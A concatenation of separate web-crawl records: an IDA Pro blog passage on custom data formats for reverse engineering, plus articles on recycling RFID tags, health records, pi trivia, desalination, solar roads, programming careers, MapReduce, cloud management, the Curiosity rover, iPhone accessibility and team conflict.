When managed properly, though, conflict can be a positive thing. A good example of conflict management is the Forming, Storming, Norming and Performing group development model. Teams and workgroups made up of IT professionals are, almost by definition, going to include smart people with strongly held opinions. That there will be disagreements is not necessarily bad; it comes down to how those opinions are communicated and perceived.
From the outside, LionReach may look like a typical 53-foot trailer, but the inside isn’t a standard training vehicle: It features state-of-the-art technology for training hospital staff and other emergency preparedness personnel. The Penn State Milton S. Hershey Medical Center purchased LionReach with a $1.5 million grant from the U.S. Department of Health and Human Services. As part of the grant, the vehicle was outfitted with tech-savvy training tools.
“The idea was to have a vehicle that we could take from place to place, that we could use to train people on multiple things,” said Nancy Flint, the LionReach program coordinator.
The trailer features Laerdal mannequins in adult, pediatric and newborn sizes to facilitate medical training. “These things are so sophisticated that they breathe, talk, sweat — we can get fluids to come out of just about any portion of them — and they can be programmed,” Flint said. The mannequins can be remotely controlled by an instructor and provide a safe environment for people to practice without training on real patients.
Photo: A woman trains on a Laerdal mannequin. Courtesy of the Penn State College of Medicine.
LionReach also has advanced airway heads that let trainees identify alternate ways of airway management on adult- and pediatric-sized mannequins.
Three computer-based preparedness simulations were developed with the grant: pandemic flu, blast mass casualty and large-scale hospital evacuation. The computers are linked through an Ethernet wireless network, which allows for complex decision-making scenarios. “Everybody’s mutual decisions kind of cascade down and may affect each other,” Flint said. “So we’re able to teach some of the hospitals to understand that their decisions are sometimes not right or wrong, but there are trade-offs.”
Video and audio of the training seminars can be recorded for detailed debriefings with the trainees: Instructors can show students how they reacted to a situation and provide additional insight. “If you want to go back and debrief with your students, you can ask, ‘Why did you do this?’ And they say, 'Wow, I didn’t know I did that,’” she said.
The vehicle also is outfitted to teach about communication technology, such as 800 MHz radios and switching talkgroups. Flint said Pennsylvania put radios in LionReach so the state can use the vehicle to train rescue personnel to use the equipment. The trailer also has satellites, webcams and video-conferencing equipment.
The medical center is looking at developing agreements with government agencies to use LionReach as an incident command center during an emergency. “If there’s something bad that happens, they [could] give us a call, then we can take this vehicle out and set it up,” Flint said.
Photo: LionReach features state-of-the-art technology for training hospital staff and other emergency preparedness personnel. Courtesy of the Penn State College of Medicine.
LionReach was exhibited at a Pennsylvania Emergency Management Agency conference, and Flint said it was interesting to hear ideas that different groups had about how they could use the trailer. “That’s the beauty of it; they know what needs they have, and the vehicle is flexible enough that we can come in and fill those gaps for them,” she said.
Although the vehicle isn’t licensed for patient care, it helped the university medical center manage patients during the H1N1 outbreak. Flint said after the governor declared H1N1 a pandemic, LionReach was deployed to aid triaging. It was staged outside of the emergency department, and staff registered patients and determined if they needed to be treated in the emergency room. | <urn:uuid:9f0b2c7d-fd6f-4dc6-aa91-7051b9bed2da> | CC-MAIN-2017-04 | http://www.govtech.com/em/training/Penn-State-LionReach-Training-Vehicle.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00028-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960538 | 811 | 2.609375 | 3 |
The first step in helping your teen deal with cyberharassment is for you to be aware there is a problem. The recent article “What Parents Can Do to Help Teen Victims of Cyber Bullying” provides great tips on how to help your teen open up, and work together to end the harassment:
Have the ‘Cyber Bullying’ Conversation: Children don’t like to talk about bullying, but according to Roberts, “the reason for this is they have likely bullied themselves, been bullied or been a bullying bystander and the talk brings up these memories and feelings of shame.” Parents need to have an open conversation and respond without judgment as their children open up about what they know.
Explain How What You Don’t Know Does Hurt You: Some kids minimize or justify cyber bullying by saying that the target didn’t even know what was said. Roberts suggests explaining to your kids that it still hurts. “Use their life experiences to illustrate how badly they feel when people talk about them negatively,” she says.
Set Cyber Safety Rules: Whenever your children interact online, remind them that they never really know who is on the other end of cyber communication. With that in mind, Roberts recommends enforcing the guideline of “don’t do or say anything online that you wouldn’t do or say in person.”
Monitor Online Use: Know what your children are doing online to help them prevent cyber bullying and cope with it. Limit time spent on technology to naturally minimize access to and involvement with cyber bullying, suggests Roberts. | <urn:uuid:d3b0578c-b305-4960-82c7-aa94698886f8> | CC-MAIN-2017-04 | https://interwork.com/parents-can-help-teen-victims-cyber-bullying/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00514-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954885 | 327 | 3.21875 | 3 |
Public Key Infrastructure could revolutionise the way companies do business online - if only anyone would use it, says Danny Bradbury
Public Key Infrastructure (PKI) is a security mechanism for guaranteeing that on-line communications are authentic and private. It is gaining recognition as a means of implementing secure e-commerce, thereby combating one of the major concerns about doing business online.
Where does it come from?
Although PKI has retained a high profile in recent times, its history extends back over 30 years. It was originally invented at GCHQ, the government's top-secret communications centre in the late 1960s. The US took it further and demonstrated PKI in the mid-1970s. Since then, various commercial organisations have adopted the technology and implemented it for profit.
How does it work?
PKI has two main goals: first to guarantee that the information someone is sending you is private and can't be read by anyone else; and second to ensure that the person sending you data across the Internet is who they say they are. The way it works is based on the exchange of software keys between individuals. Someone taking part in a PKI system has two keys, one of which is private and the other of which is public. If you have someone's public key, you can use it to encrypt a message that can only be deciphered by applying their private key.
That takes care of the first goal. The second goal - authentication - is solved by using digital certificates, which are issued by a trusted third party known as a certificate authority. A certificate is signed using the certificate authority's private key and contains the person's public key. You verify the certificate's signature, read it to find the public key, and then use that key to check messages from its owner. If you trust the authority that issued the certificate, then you can be sure that the person sending you the message is who they say they are.
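The public/private key relationship described above can be illustrated with a toy RSA example. This is purely a teaching sketch: the primes are tiny, there is no padding, and real systems rely on vetted cryptographic libraries and large keys.

```python
# Toy RSA illustration of the public/private key idea described above.
# Do NOT use for real security; production PKI uses vetted libraries,
# large keys and proper padding schemes.

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y

def modinv(a, m):
    """Modular inverse of a mod m."""
    g, x, _ = egcd(a, m)
    return x % m

# Tiny primes, purely for demonstration.
p, q = 61, 53
n = p * q                     # modulus, shared by both keys
phi = (p - 1) * (q - 1)
e = 17                        # public exponent
d = modinv(e, phi)            # private exponent

def encrypt(m, pub):          # anyone with the public key can encrypt
    exp, mod = pub
    return pow(m, exp, mod)

def decrypt(c, priv):         # only the private key holder can decrypt
    exp, mod = priv
    return pow(c, exp, mod)

message = 42
cipher = encrypt(message, (e, n))
print(decrypt(cipher, (d, n)))  # → 42
```

The same key pair supports authentication when run in reverse: a value transformed with the private key can be checked by anyone holding the public key, which is the mechanism certificates build on.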
Why is it important?
PKI is particularly significant in an e-commerce context because people are worried about the security of online trades and the privacy of information such as credit card details. It is particularly significant in a business-to-business (B2B) context because transactions in this space are often of a higher value than consumer purchases. Companies are starting to examine PKI as a means of non-repudiation - that is, proof that a transaction was made by a specific party.
Who is doing it?
Various banks and financial institutions are starting to climb on to the PKI bandwagon, propelled by organisations such as Identrus. There are a few certificate authorities attempting to promote PKI across the board. These companies include VeriSign (www.verisign.com) and IBM.
What are the challenges?
The key issue here is to promote PKI among the end-user community. Even now, with online trading having been around for a good few years, the banks and financial institutions are only just starting to get to grips with PKI. Your average consumer probably won't even have heard of it, in spite of links to certificate authorities built into desktop Windows applications such as Microsoft Outlook.
Certainly, vendors and governments alike are trying to promote PKI as a secure way to do business. The Electronic Communications Act, passed by the UK government in May last year, finally made electronic signatures legally admissible and defined key generation and management as a contributory service to the generation of a digital signature. Microsoft has also gone to great lengths to integrate PKI capabilities into Windows 2000 at the server level.
But the end-user community is notoriously slow on the uptake with regards to new technologies and it has proven difficult to integrate support for PKI into applications, especially when they are bespoke developments.
Will we see enhancements?
One thing that could help promote PKI to consumers is its integration with smart cards - many of which could be manufactured in key chain form. Rainbow Technologies produces a hardware key - the iKey - with the ability to include PKI directly into the hardware. Nevertheless, this doesn't seem to have captured the attention of the consumer market yet.
Come together: Identrus
Identrus is a consortium of financial institutions that have come together to create a system for universally-accepted digital certificates. End-user customers using digital certificates issued by Identrus-compliant financial institutions are able to trade with each other securely. Some banks have already started rolling out Identrus-compliant applications for B2B trading, although most members are still in the development stage. | <urn:uuid:39cb0a4f-8649-4d2d-b6f7-0e889a5d1b98> | CC-MAIN-2017-04 | http://www.computerweekly.com/feature/Why-PKI | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00148-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.968073 | 941 | 3.125 | 3 |
There’s no doubting the convenience of wireless networks. Their flexibility and ease has made them both the joy and the bane of network administrators. But those very same administrators may have a new tool for configuring and securing their wireless efforts, if research from the Palo Alto Research Center (PARC) finds its way into commercial products.
The computer science group at PARC has developed technology it hopes will allow network administrators to quickly deploy wireless systems without compromising security. The research resulted from PARC’s decision to use digital certificates for communication between wireless devices inside the lab. While highly secure, the devices would often take hours to get up and running. So researchers developed "gesture-directed automatic configuration." The technique permits two devices, say a laptop and a wireless access point, to identify each other and automatically configure a secure channel in less than a minute.
The technology uses a secondary channel, such as infrared, for initial communication between the devices. Using this channel, the systems exchange configuration information?including certificates?automatically. "You can only do that if you have physical access to the access point, as infrared has a very limited range," says Glenn Durfee, a security researcher in the computer science lab at PARC. And infrared isn’t the only option. PARC is working on other solutions, from audio signals to USB tokens, that would work as well. For enterprises, users could bring unconfigured devices to an "enrollment station" (such as a specially configured access point or PC) in a secure location where the process could quickly take place.
PARC is currently seeking partners for licensing the technology, though it could not provide any details about when commercial products might become available. You can find more information by visiting www.parc.com and searching for "network in a box." (For a more complete description of the instant-network process, see "Instant Networking," www.cio.com/printlinks.) | <urn:uuid:3ecad695-6413-4442-b12f-3384958fceb6> | CC-MAIN-2017-04 | http://www.cio.com/article/2439630/wifi/new-tools-for-instant-wireless-networks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937112 | 402 | 2.71875 | 3 |
Dealing with Hazmat Issues:
Hazardous material spills can take a hefty toll on all involved parties. Cleanup bills, legal liabilities and frustration for affected property owners only scratch the surface of problems commonly associated with spills. With the potential for facility downtime and personnel injury, it is in the industry's best interest to be involved in and oversee the cleanup of these incidents.
By understanding our responsibilities regarding the release of hazardous materials and knowing how to react when an incident occurs, we can minimize the required cleanup effort and the subsequent cost associated with the incident. While it is impossible to eliminate spills altogether, instances can be minimized and cleanups can be simplified if the right steps are taken. What follows are the mandated reactionary steps to be taken in the event of a hazardous substance release.
The responsibility and liability for these efforts lie with the owner of the hazardous material and/or the entity responsible for the release. While insurance providers may also be involved in the loss, they are not directly responsible or accountable for the cleanup of the spill.
What Are We Dealing With?
Hazardous substances or materials are specifically defined by the federal government under many environmental statutes, but most chemical substances that pose a health risk upon exposure are deemed hazardous substances.
When a hazardous substance is released to the environment, or poses a substantial threat to the environment, a release has occurred. The environment includes surface water, groundwater, drinking water supplies, land surface, subsurface strata, ambient air, dry gullies and storm sewers that discharge to surface waters.
If the release is equal to or exceeds the reportable quantity for that substance as set forth under the Code of Federal Regulations, the release must be properly reported (see Spill Reporting). In many states, petroleum products are regulated with a reportable quantity, typically established at 25 gallons or a quantity sufficient to place a “sheen” on water. Asbestos-containing materials are regulated if material containing greater than 1% asbestos is disturbed (in some states, it is regulated if it contains greater than 0.1%). The responsible party is the owner of the hazardous substance that has been released, and may include the person responsible for the spill. This title cannot be transferred to another entity, nor can it be eliminated, ever.
Releases of hazardous substances can happen either at fixed facilities or during transport. Most spills are released to soil and “soak in” before reaching surface water, or are released within the confines of a facility. More than half of all spills are fuel spills resulting from ruptured fuel tanks during truck wrecks. These situations are relatively simple to clean up.
Hazardous substances that are released to surface waters, sewer systems, drinking water supplies, or that impact groundwater require specialized equipment and expertise. Cleanup efforts for such instances can be quite costly and may be subject to penalties under the Clean Water Act. These penalties can cost as much as $25,000 per day of violation.
When a release occurs, there are a number of reporting and notification requirements that must be followed by the responsible party. These requirements tend to be confusing, and often overlap. Parties should consider their situation and make the following phone call(s):
All Hazardous Substance Releases
Fuel Storage Tank Releases
In many situations, if a reportable quantity has been released, several of these entities must be redundantly contacted. These reports typically require written follow-up within 24 hours. This action initiates a process that alerts potential receptors and the surrounding population, and may initiate regulatory response efforts. This reporting also initiates a process that will ultimately trace the cleanup to final closure.
Hazardous material release incidents are regulated by the federal and state government under many environmental statutes, as well as worker protection statutes. The enforcement and oversight of the cleanup is usually delegated to the Designated Emergency Response Authority (DERA) for the spill. The DERA may be the state highway patrol, local fire department, sheriff, state health department or the United States Environmental Protection Agency (USEPA), depending upon the location and complexity.
Cleanup of uncontrolled releases of hazardous substances is further regulated under OSHA. OSHA mandates that workers who provide these services are properly trained, are medically fit to wear respiratory protection, and are properly equipped for and knowledgeable about the hazards present. Training requirements are specified in detail, as are the site control requirements.
Spills generally require complete removal of all contamination, regardless of quantity spilled. If complete removal is not reasonably feasible, risk-based cleanup standards may be sought through the regulators. It should be noted, however, that establishing and gaining approval for risk-based cleanup standards is typically very expensive, and often outweigh the cleanup costs of complex removal methods. After cleanup, demonstration of appropriate removal is required, normally through comprehensive sampling and laboratory analysis of the area of contamination.
Certain spilled materials are not directly regulated by environmental cleanup statutes or may be specifically regulated to allow “less than complete” removal. However, cleanup may be dictated by other statutes. Various statutes allow less than complete removal of hazardous substances that have been released. Common examples include petroleum products (RAC guidelines) and polychlorinated biphenyls (PCBs; TSCA guidelines). Beyond cleanup to satisfy regulatory requirements, many releases are being cleaned up to exceed these requirements simply to reduce potential liabilities regarding worker or personnel exposure. These substances may be cleaned up to other non-mandated standards to avoid these liabilities, such as those of the National Institute for Occupational Safety and Health (NIOSH) or the American Conference of Governmental Industrial Hygienists (ACGIH) for indoor air quality. This is common in manufacturing facilities where “non-hazardous” substances may have been released within the plant and worker exposure to the substance may still be of concern.
Mitigation and Cleanup Measures
Released hazardous substances often destroy property and adversely affect the health of the people exposed. Wastes generated as a result of cleanup are quite costly to dispose of, and typically carry a potential liability forever (known as cradle-to-grave responsibility). Initial stabilization measures should be taken to protect those who may come in contact with the material, to contain the material and reduce the spread of the release, and to minimize the volume of materials that are polluted.
The first responder normally provides stabilization of a release. This may be the fire department, state patrol or a cleanup contractor. Initial efforts should attempt to control the release by closing valves, plugging leaks, etc. These measures are to be taken only by qualified personnel with suitable protection. Precipitation events, traffic and other means may mobilize spilled materials, which will increase the spill cleanup requirements and subsequent costs. Control efforts should be taken quickly to minimize the spread of material to lakes, waterways and other environmentally sensitive areas, as well as sewer systems, streams, open roadways, or other areas that will accelerate the spread of contamination. These efforts may include diking, plugging, overpacking, transferring, covering or through the use of containment booms like floating dikes.
Upon stabilization, or concurrent with stabilization, the spilled material and all affected areas must be cleaned up. These measures should be timely and may entail:
The costs to clean up hazardous material spills are significant, and lack of experience or proper equipment by the cleanup party can dramatically increase these costs. Determining specific cleanup measures should be a process that considers cost, method effectiveness and satisfaction of regulators and property owners. However, disposal costs of wastes generated, replacement value of damaged items, the cost of suspended service/lost business and other lagging or indirect costs should also be considered when determining cleanup strategies. Too often, these costs are not considered, and less expensive cleanup measures are taken that produce excessive waste disposal costs. In these situations, the final cost of the loss may be significantly greater than necessary.
Disposal of waste will be integral to or follow cleanup efforts and may take several months to arrange and schedule. Waste may be categorized as Hazardous, Industrial, Special, or exempt.
Special / Industrial Wastes
Mitigation and cleanup of spilled hazardous materials can be quite costly and, if not managed properly, can result in greatly elevated cleanup costs, increased liabilities and significant fines. Normally, time is of the essence and remains critical in stabilization of most spills – however, careful planning and selection of the best cleanup method is often more cost effective for the final cleanup. Costs and liabilities can be greatly reduced by understanding the fundamental elements that drive the cleanup effort and by managing these efforts with individuals who are qualified and possess direct experience with spill cleanup.
About the Author | <urn:uuid:5c566f4b-4e98-418d-8aa4-75c4a157b6f5> | CC-MAIN-2017-04 | http://www.disaster-resource.com/articles/08p_122.shtml | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00478-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946581 | 1,760 | 2.875 | 3 |
The Trace Route utility of OpUtils software records the route followed in the network between the sender's computer and a specific destination computer.
Click the Tools tab.
Choose Trace Route available under the Diagnostic Tools category.
Enter the IP Address/Host Name to which the route has to be traced.
Enter the Maximum Hops the packets should traverse before reaching the destination.
Enter the Timeout period in seconds, when the packet should be considered as expired and can be discarded.
To configure ICMP properties click Settings located in the top right corner or click Admin -> Settings. For details read the Configuring ICMP section.
Click the Trace button.
Check the results. The Trace Route results show the path that the TCP/IP packets take to reach a given destination, entered as an IP address or domain name. The results display the number of routers/hops that the packets traverse before they reach the destination address/host, along with the IP Address, DNS Name and Response Time for each hop. Because three packets are sent for each hop, the response times for all three packets are displayed in the result table.
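The hop-by-hop results described above come from a standard trick: probes are sent with increasing TTL (hop limit) values, and each router that drops an expired probe identifies itself. A minimal simulation of that idea follows; the router path is made up for illustration and this is not OpUtils' internal logic.

```python
# Conceptual sketch of the mechanism a traceroute tool relies on: each
# probe is sent with an increasing hop limit (TTL), and the router at
# which the TTL expires reports itself back. The "network" below is a
# made-up list of router addresses, not real devices.

PATH = ["192.168.1.1", "10.0.0.1", "172.16.5.9", "203.0.113.7"]

def send_probe(ttl, path):
    """Return (address, status) for a probe sent with this TTL."""
    if ttl < len(path) - 1:
        return path[ttl], "TTL expired"       # an intermediate router replies
    return path[-1], "Destination reached"    # probe made it all the way

def trace(path, max_hops=30):
    hops = []
    for ttl in range(max_hops):
        addr, status = send_probe(ttl, path)
        hops.append((ttl + 1, addr))
        if status == "Destination reached":
            break
    return hops

for hop, addr in trace(PATH):
    print(hop, addr)
# → 1 192.168.1.1
#   2 10.0.0.1
#   3 172.16.5.9
#   4 203.0.113.7
```

A real implementation sends UDP or ICMP probes over raw sockets and times each reply, which is where the three response-time columns come from.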
MAID, or massive array of idle disks, has the potential to make disk-based storage the archive technology of choice in the future. For now, though, IT managers are right to be somewhat skeptical.
The selling point of MAID is that it delivers hard-drive-array-class performance when data is requested, yet reduces the amount of energy wasted while archive data sits idle. The reduction in power consumption and heat that the MAID model provides puts disk almost in the energy-efficiency class of tape.
MAID products are disk-based archives with unique capabilities that not only minimize power consumption but also prolong the lives of hard drives. The MAID concept has been around for a while, but there is currently only one company delivering live MAID solutions: Copan Systems.
As utility costs and the demand for rapid data access continue to rise, MAID could become even more compelling for long-term storage archiving.
At any given time, only about 25 percent of the disks in a MAID archive are active, with the other 75 percent in an idle state. A MAID system will consume about one-fourth to one-fifth the amount of power of a standard hard-drive-based archive, depending on how often data is accessed.
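The savings figure can be sanity-checked with simple arithmetic. The sketch below uses an assumed disk count and assumed per-drive wattages, not published Copan specifications; the actual ratio depends on how often archived data is accessed.

```python
# Back-of-the-envelope sketch of the power comparison described above.
# The disk count and wattage figures are illustrative assumptions, not
# Copan specifications.

DISKS = 896          # hypothetical number of drives in the archive
ACTIVE_W = 10.0      # assumed draw of a spinning drive, in watts
IDLE_W = 0.8         # assumed draw of a spun-down drive, in watts

def array_power(disks, active_fraction):
    """Total draw when a given fraction of the disks is spinning."""
    active = disks * active_fraction
    idle = disks - active
    return active * ACTIVE_W + idle * IDLE_W

conventional = array_power(DISKS, 1.0)   # every disk spinning
maid = array_power(DISKS, 0.25)          # only 25 percent active at once

print(round(conventional / maid, 1))     # → 3.2 with these assumptions
```

With near-zero idle draw the ratio approaches 4, which is consistent with the one-fourth to one-fifth range quoted in the article.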
MAID naysayers often bring up the issue of stiction (static friction) when explaining why MAID is not currently widely used. Stiction is a hard drive failure in which the heads stick to the platters and do not lift when the platters are spun up. Stiction most often occurs when a hard drive is activated after a long period of inactivity.
Indeed, unlike tape, hard drives were not designed to sit idle for long periods of time. Copan therefore integrated automation programs into its MAID products that exercise the hard disks in an archive from time to time. Copan's appropriately named Disk Aerobics technology periodically spins up idle disks and runs consistency checks to ensure that the data residing on the drives is valid.
Disk Aerobics is a novel concept, and it will likely help make sure stiction problems do not occur. However, MAID products are still in their infancy, so IT managers would be right to be somewhat doubtful about the expected life span of a MAID archive.
Copan's MAID offerings, including the Revolution 220 family of products, use RAID 5 to ensure that data is protected, even if a drive happens to fail. eWEEK Labs assumes that RAID 6 could be implemented to provide dual parity, ensuring that data would not be lost even in the event that two drives in a given RAID set die simultaneously. When we spoke to Copan officials, however, they said they have no immediate plans to move to RAID 6 because their reliability record has been strong so far.
Copan's first archive unit, released in August 2004, functioned as a VTL (virtual tape library), and the company has since added file-share-level access to its MAID archives. The smallest Copan system comes in at 28TB; priced at $3.75 per gigabyte, that makes it about $108,000.
Check out eWEEK.com for the latest news, reviews and analysis on enterprise and small business storage hardware and software.
As mentioned in a previous article, 3D printing is gaining popularity and has now been approved for medicine. In some cases doctors are able to replace 75% of a patient's skull with 3D-printed material. Essentially, you would take a scan of the patient's skull, create a rendering in a CAD program, and then print it using suitable 3D printing materials. This plastic material allows doctors to X-ray through the replacement skull with ease. It is a relatively cutting-edge procedure, and Oxford Performance Materials is hoping to get other bone-producing processes passed by the FDA. It's a risk worth taking, as each new bone manufacturing technique or type could net the company upwards of $100 million.
In preparation for your CCNA exam, we want to make sure we cover the various concepts that you could see on your Cisco CCNA exam. So to assist you, below we will discuss one of the more difficult CCNA concepts: Routing Information Protocol (RIP). As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes easier. So even though it may be a difficult concept and confusing at first, keep at it, as no one said getting your Cisco certification would be easy!
RIP and RIP2: Routing Information Protocol
RIP (Routing Information Protocol) is a standard for the exchange of routing information among gateways and hosts. RIP is most useful as an “interior gateway protocol”. In a nationwide network such as the current Internet, it is unlikely that a single routing protocol will be used for the whole network. Rather, the network will be organized as a collection of “autonomous systems”. Each autonomous system will have its own routing technology, which may well differ between autonomous systems. The routing protocol used within an autonomous system is referred to as an interior gateway protocol, or “IGP”. A separate protocol is used to interface among the autonomous systems. The earliest such protocol, still used in the Internet, is “EGP” (exterior gateway protocol). Such protocols are now usually referred to as inter-AS routing protocols. Routing Information Protocol (RIP) is designed to work with moderate-size networks using reasonably homogeneous technology. Thus it is suitable as an Interior Gateway Protocol (IGP) for many campuses and for regional networks using serial lines whose speeds do not vary widely. It is not intended for use in more complex environments.
RIP2 derives from RIP; it is an extension of the Routing Information Protocol intended to expand the amount of useful information carried in RIP messages and to add a measure of security. RIP2 is a UDP-based protocol.
RIP and RIP2 are for IPv4 networks, while RIPng is designed for IPv6 networks. In this document, only the details of RIP and RIP2 will be described.
Protocol Structure – RIP & RIP2: Routing Information Protocol
- Command — The command field is used to specify the purpose of the datagram. There are five commands: Request, Response, Traceon (obsolete), Traceoff (obsolete) and Reserved.
- Version — The RIP version number. The current version is 2.
- Address family identifier — Indicates what type of address is specified in this particular entry. This is used because RIP2 may carry routing information for several different protocols. The address family identifier for IP is 2.
- Route tag — Attribute assigned to a route which must be preserved and readvertised with a route. The route tag provides a method of separating internal RIP routes (routes for networks within the RIP routing domain) from external RIP routes, which may have been imported from an EGP or another IGP.
- IP address — The destination IP address.
- Subnet mask — Value applied to the IP address to yield the non-host portion of the address. If zero, then no subnet mask has been included for this entry.
- Next hop — Immediate next hop IP address to which packets to the destination specified by this route entry should be forwarded.
- Metric — Represents the total cost of getting a datagram from the host to that destination. This metric is the sum of the costs associated with the networks that would be traversed in getting to the destination.
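The fields above map directly onto the RIP2 wire format defined in RFC 2453: a 4-byte header followed by one or more 20-byte route entries. A minimal sketch in Python; the route values here are illustrative, not taken from a live router:

```python
import socket
import struct

RIP_HEADER = struct.Struct(">BBH")       # command, version, must-be-zero
RIP_ENTRY = struct.Struct(">HH4s4s4sI")  # AFI, route tag, IP, mask, next hop, metric

def build_rip2_response(routes):
    """Build a RIP2 Response (command=2, version=2) from (prefix, mask, nexthop, metric) tuples."""
    packet = RIP_HEADER.pack(2, 2, 0)
    for prefix, mask, nexthop, metric in routes:
        packet += RIP_ENTRY.pack(
            2,                        # address family identifier: 2 = IP
            0,                        # route tag
            socket.inet_aton(prefix),
            socket.inet_aton(mask),
            socket.inet_aton(nexthop),
            metric,                   # hop count; 16 means unreachable
        )
    return packet

pkt = build_rip2_response([("10.1.0.0", "255.255.0.0", "0.0.0.0", 1)])
print(len(pkt))  # 4-byte header + one 20-byte entry = 24
```

Parsing a received datagram is the same operation in reverse: unpack the 4-byte header, then iterate over the remaining bytes in 20-byte strides.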
I hope you found this article to be of use and it helps you prepare for your Cisco CCNA certification. Achieving your CCNA certification is much more than just memorizing Cisco exam material. It is having the real world knowledge to configure your Cisco equipment and be able to methodically troubleshoot Cisco issues. So I encourage you to continue in your studies for your CCNA exam certification. | <urn:uuid:9f648f0f-30a8-4f47-a30d-d3eb189c88bc> | CC-MAIN-2017-04 | https://www.certificationkits.com/rip-ccna/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00442-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925165 | 821 | 3.71875 | 4 |
Contemporary hard drives use something called S.M.A.R.T. It stands for Self-Monitoring, Analysis and Reporting Technology, and its purpose is to predict hard drive failure and warn the user so data can be backed up elsewhere.
SMART is basically a record of several different hard drive performance metrics. Depending on the drive, the SMART table may show how long the drive has operated, how long it takes to boot, even its average operating temperature. The number of bad sectors that have developed over time is also recorded in the SMART table. You might think of a hard drive’s sectors as specific areas or addresses where data is kept.
If it takes multiple attempts to read Sector 10, for example, the drive’s operating system will copy the data to a different sector, and adjust the map of where data lives. When this happens, it’s recorded on the SMART table that another bad sector has developed. When the number of bad sectors exceeds the limit set in the SMART table, the user should get a warning that the hard drive is failing.
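The remapping logic described above can be sketched as a toy model; the class, threshold, and spare-sector pool here are illustrative inventions, not real drive firmware:

```python
# Toy model of bad-sector remapping and a SMART-style reallocation counter.
class ToyDrive:
    def __init__(self, failure_threshold=5):
        self.remapped = {}            # logical sector -> spare sector
        self.spare_pool = list(range(1000, 1010))
        self.smart_reallocated = 0    # analogue of SMART "Reallocated Sectors Count"
        self.failure_threshold = failure_threshold

    def report_read_failure(self, sector):
        """Called when reads of `sector` keep failing: move data to a spare and update the map."""
        spare = self.spare_pool.pop(0)
        self.remapped[sector] = spare
        self.smart_reallocated += 1

    def smart_warns(self):
        """The drive should warn the user once remaps exceed the configured limit."""
        return self.smart_reallocated >= self.failure_threshold

drive = ToyDrive()
for bad in (10, 11, 12, 13, 14):
    drive.report_read_failure(bad)
print(drive.smart_reallocated, drive.smart_warns())  # 5 True
```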
Relocating data to healthy sectors and keeping track of how many sectors are difficult or impossible to read prolongs the life of the drive and potentially affords some warning before a drive dies. These are both good things. But these generally helpful technologies can sometimes accelerate the hard drive’s demise when other things are going wrong.
Take the case of a bad read/write head. A read/write head is a tiny conductive loop. When it is reading data, the magnetized platter surface it flies over induces a digital electrical signal in the loop. When it is writing data, electrical impulses through the loop magnetize spots on the platter surface. If the head is not working properly, it does not reliably read data. When a read command fails due to a defective head, most hard drives will mistakenly assume that the sector they just tried to read is bad, even though the sector itself is good and the head is the real problem. So good sectors that the bad head can’t read are recorded as bad, and the hard drive tries to remap the data, add entries to the growth defect list, and increment the bad-sector count in the SMART tables. Here at Gillware we refer to real bad sectors as “hard” bad sectors, and sectors that only read as bad because of defective components as “soft” bad sectors.
The defective head will attempt to update the critical firmware area with all this new information. But, due to its failure, the head ends up writing gibberish to the hard drive’s operating system, corrupting the fundamental instructions the drive relies on to operate and to know where its data is.
That was the case with this drive, a 1 TB desktop Seagate Barracuda 7200.11 ST31000340AS with NTFS formatting. Its root problem was mechanical: a read/write head was malfunctioning. The SMART utility detected that it was getting read/write errors. It then tried to communicate with its firmware, but it did so with a malfunctioning read/write head. The result was a drive that became inoperable due to corrupted firmware and a bad read/write head.
To recover the data, we addressed both issues, and were able to get a 100 percent read of the files, and a 100 percent read of the master file table. Before paying, our client could see an entire directory of the recovered data in its original structure — file names, time stamps, file sizes. Our goal is to make it perfectly clear what’s been recovered. We only charge if, after reviewing the results, our client decides we succeeded.
Because addressing read/write heads is an internal repair, this case demanded clean room work, and when it arrived at Gillware it was categorized as a Tier 2 recovery.
The hard drive belonged to a nonprofit, and was first taken to a local IT shop, which in turn brought it to us. This was the response we got from the shop:
Liberty Technical Solutions provides IT services, system management, remote support and consulting services for a number of clients in several states. In such a role we occasionally come across situations where a hard drive has failed with data that is critical to the operation of the client. In this instance a Non-Profit client was trying to put together a fundraising campaign and the drive containing all of their photos from past events failed. They rely entirely on contributions, grants and benefactors so not having the photos would have been catastrophic to their fundraising efforts.
Because of our prior relationship with Gillware we recommended them to the client, knowing that they would provide the best and fastest solution. Because of Gillware’s no risk service model the client would only pay if data could be recovered and all costs were explained up front. This way the client could find out if the data was recoverable before spending money to attempt recovery. This was vital in getting the sign-off to proceed.
As a result Gillware provided a quick response and within 2 days we had a listing of all recovered files and within another couple of days the client had all their data recovered and restored to their system at a very reasonable cost.
I’m pleased to recommend Gillware for their quick response, professionalism and reasonable prices. You can be assured we will use them again.
— Sherman Jones, Liberty Technical Solutions | <urn:uuid:71dfbfb8-5a87-41fc-a39f-f667c365ca6f> | CC-MAIN-2017-04 | https://www.gillware.com/blog/data-recovery/case-study-seagate-barracuda-7200-11-st31000340as-with-failed-heads-corrupted-firmware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00074-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96257 | 1,130 | 3.34375 | 3 |
Kerberos is a standard protocol that provides a means of authenticating entities on a network. It is based on a trusted third-party model. It involves shared secrets and uses symmetric key cryptography.
For more information, refer to RFC 1510.
